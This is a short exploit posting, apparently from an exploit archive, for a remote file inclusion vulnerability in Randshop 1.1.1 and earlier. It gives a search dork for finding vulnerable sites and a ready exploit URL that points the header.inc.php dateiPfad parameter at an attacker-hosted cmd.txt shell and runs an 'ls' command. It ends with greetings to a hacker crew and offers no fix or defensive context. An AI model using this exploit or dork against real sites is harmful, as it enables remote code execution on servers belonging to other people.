id: 560
date: 06/30/2006
title: Randshop <= 1.1.1 (header.inc.php) Remote File Include Vulnerability
author: OLiBekaS
cves: 

====================================================================
Randshop <= 1.1.1 (header.inc.php) Remote File Include Vulnerability
====================================================================


Title       : randshop <= 1.1.1 Remote File Inclusion Vulnerability
-
URL         : http://www.randshop.com/
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
dork        : "software 2004-2005 by randshop"
-
exploit     : http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls
-
greatz      : Renzokuzen, skulmatic, sikunYuk, ulga, bigmaster, cgibin, weleh, and all #papmahackerlink crew
-



#  0day.today [2023-03-22]  #